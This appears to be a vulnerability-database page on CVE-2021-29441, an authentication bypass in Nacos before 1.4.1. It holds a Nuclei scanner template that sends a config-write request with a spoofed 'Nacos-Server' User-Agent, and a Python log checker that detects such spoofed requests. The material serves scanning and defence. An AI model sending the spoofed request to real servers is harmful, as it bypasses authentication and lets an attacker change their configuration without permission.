| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Authentication Bypass by Spoofing in Alibaba Nacos | 25 Jun 2026 00:29 | – | githubexploit |
| The vulnerability of the AuthFilter component in the Nacos software platform allows attackers to increase their privileges. | 24 Aug 2021 00:00 | – | bdu_fstec |
| CVE-2021-29441 | 25 Aug 2021 13:22 | – | circl |
| Nacos Security Vulnerability | 27 Apr 2021 00:00 | – | cnnvd |
| CVE-2021-29441 | 27 Apr 2021 20:20 | – | cve |
| CVE-2021-29441 Authentication bypass | 27 Apr 2021 20:20 | – | cvelist |
| Authentication Bypass | 27 Apr 2021 20:09 | – | github |
| Authentication Bypass by Spoofing | 27 Apr 2021 00:00 | – | gitlab |
| Authentication Bypass by Spoofing | 27 Apr 2021 00:00 | – | gitlab |
| Nacos < 1.4.1 Authentication Bypass (CVE-2021-29441) | 26 Oct 2021 00:00 | – | nessus |

```yaml
id: CVE-2021-29441

info:
  name: Nacos <1.4.1 - Authentication Bypass
  author: dwisiswant0
  severity: critical
  description: |
    This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
    In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
    Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
    enables Nacos servers to bypass this filter and therefore skip authentication checks.
    This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
    This issue may allow any user to carry out any administrative tasks on the Nacos server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.
  remediation: |
    Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
    - https://github.com/alibaba/nacos/issues/4701
    - https://github.com/advisories/GHSA-36hp-jr8h-556f
    - https://github.com/alibaba/nacos/pull/4703
    - https://github.com/bakery312/Vulhub-Reproduce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29441
    cwe-id: CWE-290
    epss-score: 0.74242
    epss-percentile: 0.99426
    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: alibaba
    product: nacos
  tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev,vuln

http:
  - raw:
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Nacos-Server

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403"
          - "status_code_2 == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body_1, 'Forbidden')"
          - "body_2 == 'true'"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a0047304502202b2f01e3ca538d3775018008c903a022dda37bbe9097bb34dc52290436f264fc022100db86c9b63922cf296909b9c7332aae3fba41f30c0f32ba51c2aa0cda6d62fd0c:922c64590222798bb761d5b6d8e72950
```
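
A defender-side check for the behaviour the template probes, as an added example that is not part of the template or of the Nacos project: it scans access-log lines for requests whose User-Agent claims to be a Nacos server but whose source address is not a known cluster member. The log layout, the peer list, the function name and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumed combined-style access log layout; adapt the pattern to your own format.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Header value the template sends; prefix match so a version suffix is also caught (assumption).
SERVER_UA_PREFIX = "nacos-server"
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def find_spoofed_server_requests(lines, cluster_peers):
    """Return requests that claim the Nacos server User-Agent from a non-peer address."""
    peers = [ipaddress.ip_network(p, strict=False) for p in cluster_peers]
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not m["ua"].strip().lower().startswith(SERVER_UA_PREFIX):
            continue  # unparseable line or ordinary client
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            src = None  # hostname in the source field: cannot be matched to a peer
        if src is not None and any(src in net for net in peers):
            continue  # genuine server-to-server traffic
        findings.append({
            "src": m["src"], "time": m["ts"], "method": m["method"],
            "target": m["target"], "status": int(m["status"]),
            # a 2xx answer to a write means the server accepted the request
            "accepted_write": m["method"] in WRITE_METHODS and m["status"][0] == "2",
        })
    return findings


# Constructed sample lines (documentation addresses, not from a real system).
CFG = "/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo"
SAMPLE_LOG = [
    f'10.0.0.11 - - [27/Apr/2021:20:20:01 +0000] "GET {CFG} HTTP/1.1" 200 10 "-" "Nacos-Server:v1.4.0"',
    f'203.0.113.50 - - [27/Apr/2021:20:21:07 +0000] "POST {CFG}&content=helloWorld HTTP/1.1" 403 98 "-" "curl/7.68.0"',
    f'203.0.113.50 - - [27/Apr/2021:20:21:08 +0000] "POST {CFG}&content=helloWorld HTTP/1.1" 200 4 "-" "Nacos-Server"',
    f'198.51.100.7 - - [27/Apr/2021:20:25:30 +0000] "GET {CFG} HTTP/1.1" 200 10 "-" "nacos-server"',
]
CLUSTER_PEERS = ["10.0.0.11", "10.0.0.12"]  # assumed cluster member addresses

if __name__ == "__main__":
    for hit in find_spoofed_server_requests(SAMPLE_LOG, CLUSTER_PEERS):
        print(hit)
```

A finding with `accepted_write` set on an instance that has authentication enabled is the same 403-then-200 pattern the template's matchers look for, seen from the server side.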